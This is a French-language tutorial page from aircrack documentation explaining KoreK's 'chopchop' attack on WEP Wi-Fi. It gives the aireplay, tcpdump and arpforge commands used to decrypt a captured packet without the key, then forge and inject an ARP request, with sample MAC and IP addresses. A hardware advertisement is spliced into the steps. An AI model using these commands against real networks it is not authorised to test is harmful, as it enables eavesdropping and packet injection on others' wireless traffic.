Traduction française, original view it in english
Voir le tutorial

Documentation de aircrack

retour a l'index de la doc

Attaque 4: KoreK's "chopchop" (prédiction CRC)

Cette attaques, lorsqu'elle fonctionne, peut décrypter un paquet WEP sans en connaitre la clef. Elle peut même fonctionner contre une WEP dynamique. Cette attaque ne récupère pas la clef WEP elle-même, mais indique simplement le plaintext. Cependant, la plupart des points d'accès ne sont pas vulnérables. Certains peuvent sembler vulnérables d'abord mais actuellement les paquets de données sont plus petits que 60 bytes. Cette attaque exige au moins un paquet de données de WEP.

@ MAC de l'AP (canal 6):00:13:10:30:24:9C
@ MAc du client wifi: 00:09:5B:EB:C5:2B

  1. Premierement on decrypte le paquet:

    aireplay -4 -h 00:09:5B:EB:C5:2B ath0

  2. Regardons l'adresse IP :

    tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
    reading from file replay_dec-0627-022301.cap, link-type [...]
    IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

    Tout le Wifi chez Wifi-Highpower: cartes, antennes, routeurs, Alfa Network, Awus036H...

  3. Ensuite forgeons une requete ARP.

    L'adresse IP source (192.168.1.100) importe peu, mais celle de destination (192.168.1.2) doit correspondre aux requetes ARP. L'adresse MAc de la souce doit appartenir a une station associée.

    ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
    00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

  4. Et envoyons notre requete ARP:

    aireplay -2 -r arp.cap ath0

© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier nÝ 1142196
Rc v2.0